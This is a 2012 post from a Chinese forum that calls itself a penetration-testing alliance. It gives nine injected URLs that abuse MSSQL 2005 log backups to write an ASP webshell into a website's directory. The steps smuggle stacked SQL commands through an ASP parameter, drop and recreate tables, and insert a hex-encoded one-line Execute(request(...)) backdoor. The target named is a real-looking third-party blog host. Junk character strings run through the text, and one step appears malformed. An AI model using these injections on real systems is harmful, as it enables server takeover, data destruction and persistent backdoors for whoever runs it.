中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
. I9 H5 W8 O6 ^  Q* f! Ghttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
' @, F1 b: [  ?- d2 u! Yhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
- E" E* ]# \8 y7 Y+ Q+ C0 r0 Y
第四步
6 @/ j+ e( X( m  h, p9 R+ Ohttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
: u$ r$ E! B  K6 X
4 C; b" R* u% ~* \1 z第五步
! \) `! ?3 ^. {+ ohttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

$ t* S# n% A. u% |- B5 {+ [第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
4 y1 r2 @: `- J; ^* r
第七步
$ \" J" S( u8 H3 t! bhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
1 M1 X- `" u- }3 U# m4 e$ Z
第九步
, U, A6 @& _; l8 j0 s- m, K6 `0 w7 Whttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2